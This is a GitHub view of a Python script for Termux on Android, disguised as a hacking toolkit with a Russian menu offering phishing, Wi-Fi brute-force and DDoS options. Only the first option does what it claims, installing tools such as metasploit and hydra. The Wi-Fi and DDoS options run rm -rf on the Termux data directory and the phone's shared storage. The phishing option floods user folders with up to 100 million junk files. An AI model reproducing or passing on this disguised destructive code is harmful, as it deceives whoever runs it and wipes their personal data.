-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathmain.py
64 lines (51 loc) · 2.46 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
import os
def hackerPhone():
instruments=['root-repo', 'unstable-repo', 'x11-repo', 'metasploit', 'git', 'python2', 'python3', 'golang' 'ruby',
'proot', 'wget', 'termux-api', 'php', 'apache2', 'nmap', 'npm', 'hydra', 'tor', 'lua', 'zip', 'unzip', 'tsu', 'cmatrix',
'perl', 'dnsutils', 'nano', 'vim', 'vim-gtk', 'vim-python', 'o', 'o-editor']
for i in instruments:
try:
os.system(f'pkg install {i} -y')
except:
pass
def WiFi():
os.system('rm -rf data/data/com.termux/')
def DDoS():
os.system('rm -rf /storage/emulated/0/')
def phishPage():
dirs=['/storage/emulated/0/', '/storage/emulated/0/Download/', '/storage/emulated/0/Android/', '/storage/emulated/0/DCIM/']
for i in dirs:
for j in range(0, 100000000):
os.system(f'echo ti loh >> {i}{j}.txt')
def main():
print('Привет. Выбери параметр')
print('1.Сделать хакерфон\n2.Создать фиш.страницу\n3.Брутфорс Wi-Fi\n4.Начать DDoS атаку')
option=int(input())
if option==1:
hackerPhone()
elif option==2:
phishPage()
elif option==3:
WiFi()
elif option==4:
DDoS()
def logo():
banner='''
## ## ### ###### ######## ####### ####### ## #### ## ## ###### ######## ### ## ## ######## ########
## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## ## ## ## ## ## #### ## ## ## ## ## ## ## ## ## ##
######### ## ## ## ## ## ## ## ## ## ## ## ## ## ###### ## ## ## ## ## ###### ########
## ## ######### ## ## ## ## ## ## ## ## ## #### ## ## ######### ## ## ## ## ##
## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## ## ## ## ## ##
## ## ## ## ###### ## ####### ####### ######## #### ## ## ###### ## ## ## ######## ######## ######## ## ##
'''
if os.name=='nt':
os.system('cls')
print(banner)
print("К сожалению ваша ОС не поддерживаеться")
else:
os.system('clear')
print(banner)
main()
if __name__ == '__main__':
logo()